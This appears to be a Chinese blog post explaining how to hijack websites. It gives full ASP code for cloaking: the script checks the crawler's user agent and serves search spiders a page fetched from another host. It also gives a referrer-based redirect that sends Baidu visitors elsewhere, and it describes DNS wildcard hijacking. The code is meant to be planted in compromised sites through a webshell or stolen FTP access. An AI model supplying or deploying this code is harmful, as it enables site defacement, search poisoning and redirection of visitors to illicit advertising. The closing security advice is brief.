网站劫持操作方法

这两天看到有网友问网站引擎劫持,网站快照劫持,新闻源劫持是怎么操作的。结果大多数网友都表示不了解,我今天来跟大家分享一下网站劫持是怎么操作的。


1.网站快照劫持


动态页面首页通过在PHP或者ASP,ASPX文件中添加判断代码,判断如果是蜘蛛访问就修改标题内容,在标题内容写入联系方式和非法广告信息,如果不是蜘蛛访问就不做修改。


静态页面首页,在下午三点左右删除你的.html文件,添加inde.php,php中写入类似上面的语句,如果是蜘蛛就返回修改了标题的首页内容,不是就返回正常内容。


快照劫持比较讨厌,就算你修复了劫持,百度上还是会显示很长一段时间的非法快照信息。


20170103201931_94733.jpg


代码如下:


<%


function GetBot()


‘查询蜘蛛


dim s_agent


GetBot=””


s_agent=Request.ServerVariables(“HTTP_USER_AGENT”)‘关键判断语句


if instr(1,s_agent,”googlebot”,1)>0 then


GetBot=”google”


end if


if instr(1,s_agent,”msnbot”,1)>0 then


GetBot=”MSN”


end if


if instr(1,s_agent,”slurp”,1)>0 then


GetBot=”Yahoo”


end if


if instr(1,s_agent,”baiduspider”,1)>0 then


GetBot=”baidu”


end if


if instr(1,s_agent,”sohu-search”,1)>0 then


GetBot=”Sohu”


end if


if instr(1,s_agent,”lycos”,1)>0 then


GetBot=”Lycos”


end if


if instr(1,s_agent,”robozilla”,1)>0 then


GetBot=”Robozilla”


end if


end function


Function getHTTPPage(Path)


t=GetBody(Path)


getHTTPPage=BytesToBstr(t,”GB2312″)’编码


End function


Function Newstring(wstr,strng)


Newstring=Instr(lcase(wstr),lcase(strng))


if Newstring<=0 then Newstring=Len(wstr)


End Function


Function GetBody(url)


on error resume next


Set Retrieval=CreateObject(“Microsoft.XMLHTTP”)


With Retrieval


.Open“Get”,url,False,“”,“”


.Send


GetBody=.ResponseBody


End With


Set Retrieval=Nothing


End Function


Function BytesToBstr(body,Cset)


dim objstream


set objstream=Server.CreateObject(“adodb.stream”)


objstream.Type=1


objstream.Mode=3


objstream.Open


objstream.Write body


objstream.Position=0


objstream.Type=2


objstream.Charset=Cset


BytesToBstr=objstream.ReadText


objstream.Close


set objstream=nothing


End Function


Dim wstr,str,url,start,over,dtime


if GetBot=”baidu”then


‘给百度蜘蛛定制的内容


url=”http://baidu.seowhy.com”


‘想要展示给蜘蛛的页面地址


wstr=getHTTPPage(url)


body=wstr


response.write“”&body&””


response.end


elseif GetBot=”google”then


‘给google蜘蛛定制的内容


url=”http://baidu.seowhy.com”


wstr=getHTTPPage(url)


body=wstr


response.write“”&body&””


response.end


end if


%>


2.搜索引擎流量劫持


这种劫持比快照劫持简单,直接在首页添加,判断访问来路是搜索引擎还是其它的JS代码,当来路是搜索引擎的时候就跳转到目标站。


代码如下:


<%


if instr(Request.ServerVariables(“http_referer”),”www.baidu.com”)>0 then


‘如果用户来自www.baidu.com


response.redirect(“http://baidu.seowhy.com/”)


‘跳转指定地址end if%>


3.DNS白菜站劫持


在域名解析里添加泛解析到目标地址,在目标地址主机上大量生成劫持域名的子站。


总结:1和2需要获得网站的WEBSHELL或者FTP,如果获得了新闻源网站的这种权限,就可以做新闻源劫持;3需要获得DNS管理帐号。所以造成网站被劫持的主要原因还是自己网站被入侵,或者被扫FTP的挖掘机扫出了FTP帐号等,网络安全没做好的原因。所以只要网络安全到位,别人是劫持不你的网站的。


发表评论